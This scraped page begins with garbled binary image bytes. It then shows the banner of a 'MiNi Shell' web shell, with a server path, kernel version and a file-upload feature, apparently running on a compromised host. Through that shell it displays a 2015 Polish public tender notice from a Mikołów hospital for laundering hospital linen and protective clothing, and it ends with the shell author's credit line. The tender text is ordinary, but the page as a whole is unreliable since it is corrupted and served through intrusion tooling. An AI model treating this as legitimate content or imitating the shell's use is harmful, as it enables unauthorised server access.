JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150320/39571-N-2015.html

<p class="kh_header"><b>Mikołów: Pranie bielizny szpitalnej i odzieży ochronnej oraz jej transport do Zamawiającego</b><br>
<b>Numer ogłoszenia: 39571 - 2015; data zamieszczenia: 20.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Zdrowia w Mikołowie Sp. z o.o. , ul. Waryńskiego 2, 43-190 Mikołów, woj. śląskie, tel. 32 3257639, faks 32 2260860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-mikolow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: podmiot leczniczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pranie bielizny szpitalnej i odzieży ochronnej oraz jej transport do Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa wykonywana będzie w pralni, która posiada barierę higieniczną przez co należy rozumieć fizyczny i funkcjonalny podział na strefę czystą i brudną. W ścianie dzielącej pralnię na dwie strefy zamontowane są przelotowe urządzenia do prania z oddzielnymi otworami do załadunku bielizny po stronie brudnej i rozładunku bielizny po procesie prania po stronie czystej. Maszyny pralnicze są wyposażone w automatyczne systemy dozujące środki piorące i dezynfekujące oraz w urządzenia kontrolujące i rejestrujące parametry procesu prania i dezynfekcji (czas, temperaturę, ilość zużytych preparatów piorących i dezynfekujących). Między strefami jest śluza dla personelu przechodzącego z jednej strefy do drugiej. Śluza składa się z szatni brudnej, węzła sanitarnego i szatni czystej.
 
Zakres usługi będącej przedmiotem zamówienia obejmuje:
-transport brudnej oraz czystej bielizny  z zachowaniem wymogów sanitarnych
-pranie i maglowanie bielizny szpitalnej 
-pranie i maglowanie odzieży personelu (uwaga na napy, guziki , zamki)
-pranie materacy, kocy, poduszek
-pranie nakładek na mopy i ściereczek z mikrofazy
-oddzielne pranie i maglowanie  bielizny noworodkowej
-oddzielne pranie i maglowanie  bielizny operacyjnej
-dezynfekcję pościeli i odzieży skażonej
-reperowanie uszkodzonej bielizny i pościeli, drobne naprawy, przyszywanie guzików, łatanie niewielkich dziur, zszywanie rozdarć, zakup oraz wymiana zamków błyskawicznych i nap
-pakowanie i dostarczanie czystej bielizny (bez wszelkiego rodzaju zabrudzeń i plam) z zachowaniem podziału na poszczególne komórki organizacyjne - oddziały  szpitalne, poradnie, ZPO
Przetarg nieograniczony o wartości szacunkowej nie przekraczającej wyrażonej w złotych równowartości kwoty 207 000 euro.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 50.83.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium w wysokości 4 000,00 zł
słownie: cztery tysiące złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca przedłoży: 
-pozwolenie, zaświadczenie, opinia właściwego inspektora sanitarnego dopuszczająca pralnię do świadczenia usług prania odzieży i bielizny szpitalnej, wystawione bądź potwierdzone nie wcześniej niż 12 miesięcy przed terminem składania ofert.
-pozwolenie, zaświadczenie, opinia właściwego inspektora sanitarnego dopuszczająca samochody do transportu bielizny brudnej i czystej, wystawione bądź potwierdzone nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca
-wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej dwie usługi prania bielizny szpitalnej i odzieży ochronnej na rzecz szpitala, w ilości co najmniej 4000 kg miesięcznie każda, trwające przez okres co najmniej 1 roku każda     z wyszczególnieniem prania z oddziału noworodków i z sali operacyjnej).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo wymagań w zakresie spełniania tego  warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia - załącznik nr 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo wymagań w zakresie spełniania tego  warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia - załącznik nr 1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca
-posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejsza niż 500 000,00 zł. 
Wykonawca, któremu polisa wygasa w trakcie realizacji zamówienia zobowiązany jest do złożenia oświadczenia, że będzie kontynuował ubezpieczenie i przedstawi Zamawiającemu aktualną polisę na kwotę min. 500 000 zł
Ocena spełniania poszczególnych warunków przez Wykonawców zostanie dokonana na podstawie  złożonych dokumentów i oświadczeń, wymaganych przez Zamawiającego w pkt. V SIWZ i zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">do pkt. III.4.1.
-pozwolenie, zaświadczenie, opinia właściwego inspektora sanitarnego dopuszczająca pralnię do świadczenia usług prania odzieży i bielizny  szpitalnej, wystawione bądź potwierdzone nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert
-pozwolenie, zaświadczenie, opinia właściwego inspektora sanitarnego dopuszczająca samochody do transportu bielizny brudnej i czystej, wystawione bądź potwierdzone nie wcześniej niż 12 miesięcy przed upływem terminu składania ofert
-wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane - załącznik nr 4 - co najmniej dwie usługi prania bielizny szpitalnej i odzieży ochronnej na rzecz szpitala, w ilości co najmniej 4000 kg miesięcznie każda, trwające przez okres co najmniej 1 roku każda z wyszczególnieniem prania z oddziału noworodków i z sali operacyjnej).  
-dowody potwierdzające, że usługi wymienione w załączniku nr 4 zostały wykonane lub są wykonywane należycie tj. poświadczenie, z tym że w odniesieniu do nadal wykonywanych  usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert lub oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia. W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów. 
-opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia 
-w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów Wykonawca zobowiązany jest do przedstawienia pisemnego zobowiązania tych podmiotów (np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zobowiązanie musi zawierać minimum:
- dane pozwalające na identyfikację stron,
- zakres udostępniania (w zakresie wiedzy i doświadczenia , potencjału technicznego, osób zdolnych do wykonania zamówienia, sytuacji finansowej lub ekonomicznej)
- cel i czas udostępnienia (obejmujący okres realizacji zamówienia)
- charakter stosunku jaki będzie łączył wykonawcę z innym podmiotem
inne
a)	protokół ostatniej kontroli sanitarnej przeprowadzonej w pralni, wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert
b)	protokół ostatniej kontroli sanitarnej samochodu, którym będzie świadczona usługa transportu  wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert
c)	oświadczenie Wykonawcy, że pralnia spełnia wymagania określone przez Zamawiającego zawarte w pkt. II niniejszej SIWZ tj. usługa wykonywana będzie w pralni, która posiada barierę higieniczną przez co należy rozumieć fizyczny i funkcjonalny podział na strefę czystą i brudną. W ścianie dzielącej pralnię na dwie strefy zamontowane są przelotowe urządzenia do prania z oddzielnymi otworami do załadunku bielizny po stronie brudnej i rozładunku bielizny po procesie prania po stronie czystej. Maszyny pralnicze są wyposażone w automatyczne systemy dozujące środki piorące i dezynfekujące oraz w urządzenia kontrolujące i rejestrujące parametry procesu prania i dezynfekcji ( czas, temperaturę, ilość zużytych preparatów piorących i dezynfekujących). Między strefami jest śluza dla personelu przechodzącego z jednej strefy do drugiej. Śluza składa się z szatni brudnej, węzła sanitarnego i szatni czystej. 
d)	sprawozdanie, wyniki badań mikrobiologicznych potwierdzające skuteczność prania i dezynfekcji  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
e)	oświadczenie, że w wykonywaniu zamówienia uczestniczyć będą wyłącznie osoby, które posiadają ważne badania do celów sanitarno-epidemilogicznych
f)	opis przebiegu procesu pralniczego od momentu przyjęcia bielizny i odzieży brudnej do etapu wysłania bielizny i odzieży czystej, wraz z wykazem zastosowanych środków piorących i dezynfekujących i wykazem niezbędnych do wykonania zamówienia urządzeń jakimi dysponuje Wykonawca - z zaznaczeniem urządzeń do prania bielizny noworodkowej i bielizny z sali operacyjnej. 
g)	oświadczenie wykonawcy, że zastosowane do wykonania zamówienia środki piorące i dezynfekujące posiadają  wymagane prawem dopuszczenia i atesty, oraz że odpowiednie dokumenty zostaną dostarczone na żądanie zamawiającego 
h)	informacja producenta środków piorących i dezynfekujących o stałej kontroli technologicznej pralni Wykonawcy oraz o prawidłowości dozowania środków wystawiona bądź potwierdzona nie wcześniej niż 12 miesięcy przed terminem składania ofert</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony i podpisany formularz oferty
b)	jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania Wykonawcy, do oferty należy załączyć pełnomocnictwo/upoważnienie w formie oryginału podpisane przez osoby uprawnione do reprezentowania wykonawcy albo kopii poświadczonej za zgodność z oryginałem przez notariusza
c)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia pełnomocnictwo/upoważnienie dla pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego. Pełnomocnictwo musi być w formie oryginału lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Jakość - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	zmiana stawek podatków, na podstawie obowiązujących przepisów prawnych w tym zakresie, jedynie o wysokość tych zmian i następuje w dniu wejścia w życie odpowiedniego rozporządzenia lub ustawy, na podstawie obustronnie podpisanego aneksu
2.	Zamawiający zastrzega sobie prawo do ewentualnych korekt ilościowych w przedmiocie zamówienia w zależności od aktualnych potrzeb w granicach  do - 15% ilości określonych w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-mikolow.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Zdrowia w Mikołowie Sp. z o.o. 
ul. Waryńskiego 2, 43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2015 godzina 09:30, miejsce: SEKRETARIAT
Centrum Zdrowia w Mikołowie Sp. z o.o. 
ul. Waryńskiego 2, 43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przy wyborze oferty Zamawiający będzie kierował się następującym kryterium: 

1.	cena			-  waga kryterium  - 80%		
Do oceny w przypadku kryterium cena będzie brana pod uwagę wartość brutto czyli obejmująca podatek VAT za wykonanie całości przedmiotu zamówienia 
Uzyskana liczba punktów w ramach kryterium zaokrąglona zostanie do drugiego miejsca po przecinku. Przyznawanie ilości  punktów poszczególnym ofertom odbywać się będzie wg następującej zasady:
		Cn
	C =    ---------    x 80%
		Co
	gdzie:	C  -   ilość punktów przyznana badanej ofercie
	       C n - najniższa cena spośród wszystkich proponowanych przez Wykonawców
		C o - cena przedstawiona przez  badanego Wykonawcę

Maksymalna liczba punktów przyznanych w ramach tego kryterium wynosi 80.


2.	jakość 	-  waga kryterium - 20%
Kryterium jakość będzie oceniane na podstawie złożonych dokumentów (poz. 1) i spełniania bądź nie spełniania poniższych parametrów  ( poz. 2 - 4) tj. 


l.p.	wyszczególnienie	dokument/parametr	punktacja
1	Certyfikat potwierdzający wdrożenie systemu zarządzania jakością w zakresie wykonywania usług pralnia bielizny szpitalnej - ISO lub równoważny 	
TAK / NIE	
25 / 0
2	Pranie realizowane w tunelach pralniczych gwarantujących wypłukiwanie środków piorących 	
TAK / NIE	
25 / 0
3	Suszenie w tunelach zapobiegające uszkodzeniu tkanin, guzików	
TAK / NIE
	
25 / 0
4	
Dezynfekcja w komorze dezynfekcyjnej	
TAK / NIE
	
25 / 0

UWAGA!!!
- w przypadku posiadania certyfikatu, o którym mowa w poz. 1 - należy certyfikat dołączyć do oferty,
- w przypadku spełniania parametrów jakościowych, o których mowa w poz. 2, 3, 4 - należy w formularzu ofertowym zaznaczyć TAK oraz podać nazwę , model i producenta urządzenia, w którym realizowana będzie usługa,
- w przypadku nie spełniania parametrów jakościowych, o których mowa w pkt. 2, 3, 4 - należy w formularzu ofertowym zaznaczyć NIE

Przyznawanie ilości  punktów poszczególnym ofertom odbywać się będzie wg następującej zasady:
		Jn
	J =    ---------    x 20%
		Jo

	gdzie:   J  -   ilość punktów przyznana badanej ofercie 
	 Jn - ilość punktów badanej oferty (suma pkt. z tabeli poz. 1 - 4)
	      Jo - najwyższa  ilość punktów uzyskana w tym kryterium (suma pkt. z tabeli poz. 1 - 4)

Maksymalna liczba punktów przyznanych w ramach tego kryterium wynosi 20.

Ocenę końcową oferty (Ok)  stanowi suma punktów uzyskanych w kryterium cena i jakość obliczona wg wzoru:
				Ocena k = C + J

Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach ustalonych kryteriów.
Suma przyznanych punktów w kryterium cena i jakość nie przekroczy 100.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com